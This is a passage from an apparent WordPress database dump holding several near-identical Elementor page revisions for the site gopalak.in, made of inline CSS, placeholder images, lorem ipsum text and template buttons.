<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-21 10:36:57','2022-09-21 05:06:57','',1373,'https://gopalak.in/?p=1384',0,'revision','',0),(1385,1,'2022-09-21 10:36:57','2022-09-21 05:06:57','<style>/*! elementor - v3.7.6 - 15-09-2022 */\nbody.elementor-page .elementor-widget-menu-anchor{margin-bottom:0}</style>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy tex </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-21 10:36:57','2022-09-21 05:06:57','',1373,'https://gopalak.in/?p=1385',0,'revision','',0),(1386,1,'2022-09-21 10:36:57','2022-09-21 05:06:57','<style>/*! elementor - v3.7.6 - 15-09-2022 */\nbody.elementor-page .elementor-widget-menu-anchor{margin-bottom:0}</style>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy tex </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-21 10:36:57','2022-09-21 05:06:57','',1373,'https://gopalak.in/?p=1386',0,'revision','',0),(1387,1,'2022-09-21 10:40:03','2022-09-21 05:10:03','<style>/*! elementor - v3.7.6 - 15-09-2022 */\nbody.elementor-page .elementor-widget-menu-anchor{margin-bottom:0}</style>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy tex </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-21 10:40:03','2022-09-21 05:10:03','',1373,'https://gopalak.in/?p=1387',0,'revision','',0),(1388,1,'2022-09-21 10:40:03','2022-09-21 05:10:03','<style>/*! elementor - v3.7.6 - 15-09-2022 */\nbody.elementor-page .elementor-widget-menu-anchor{margin-bottom:0}</style>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy tex </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-column 